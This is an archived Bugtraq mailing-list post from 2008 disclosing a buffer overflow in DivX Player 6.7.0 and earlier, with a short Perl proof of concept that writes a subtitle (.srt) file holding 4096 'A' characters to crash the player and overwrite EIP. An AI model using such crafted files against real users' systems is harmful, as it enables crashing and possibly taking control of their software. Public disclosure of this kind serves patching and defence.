lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080415195855.30156.qmail@securityfocus.com>
Date: 15 Apr 2008 19:58:55 -0000
From: securfrog@...il.com
To: bugtraq@...urityfocus.com
Subject: DIVX Player <= 6.7.0 Buffer Overflow PoC (  .SRT )

# DIVX Player <= 6.7.0 Buffer Overflow PoC (  .SRT )
# Bug: When parsing a subtitle file with an overly long subtitle DIVX player will deadly crash  with eip overwritted
# Replace MOVIE_FILENAME by your movie filename ( .avi )
#
#!/usr/local/bin/perl                                         
my $file="MOVIE_FILENAME.srt";                            
                                                              
my $payload = "A" x 4096;                                     
                                                              
open( $file, ">>$file") or die "Cannot open $file: $!";       
    
print $file "1 \n";
print $file "00:00:01,001 --> 00:00:02,001\n";
print $file $payload;                               
                                                              
close($file);                                                 
                                                              
print "$file has been created \n";    

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ